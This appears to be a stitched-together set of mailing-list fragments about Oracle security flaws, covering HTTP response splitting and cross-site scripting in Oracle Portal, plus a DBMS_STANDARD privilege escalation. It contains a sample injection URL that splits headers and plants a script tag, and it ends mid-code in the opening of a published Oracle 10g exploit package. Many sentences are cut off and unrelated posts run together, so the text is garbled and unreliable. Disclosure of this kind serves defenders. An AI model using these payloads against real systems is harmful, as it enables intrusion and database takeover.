Description
---
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may found in any version:
From: Brian Eaton [EMAIL PROTECTED]
To: putosoft softputo [EMAIL PROTECTED]
CC: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
Date: Wed, 20 Dec 2006 13:55:09 -0500
On 12/20/06, putosoft softputo [EMAIL
Oracle Portal/Applications HTTP Response Splitting
--
Sample:
http://target/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
How an attack can be conducted?
I can't believe it. Oracle releases new patches and they have not been
solved one of the main problems: A user with only the SELECT privilege can
do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE
I'm not sure if is time to full disclosure it but, anyway, I will full
disclosure one inocent
Hello,
I have been found a security problem in the DBMS_STANDARD package. Anyone
knowns any kind of workaround for this problem? You can't create a package
called DBMS_STANDARD and rename the old one to any other name to create an
envoltory so there is no way (I think) to solve it.
Any
Patches for 10.2.0.2.0 have been released but the bug is not solved. Patches
for other plattforms (such as HPUX or AIX) have been re-scheduled. It's not
important because ANY plattform (even with latest CPU) is vulnerable.
An exploit for Oracle 10.2.0.2.0 was published by N1v1hD $3c41r3 and
/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN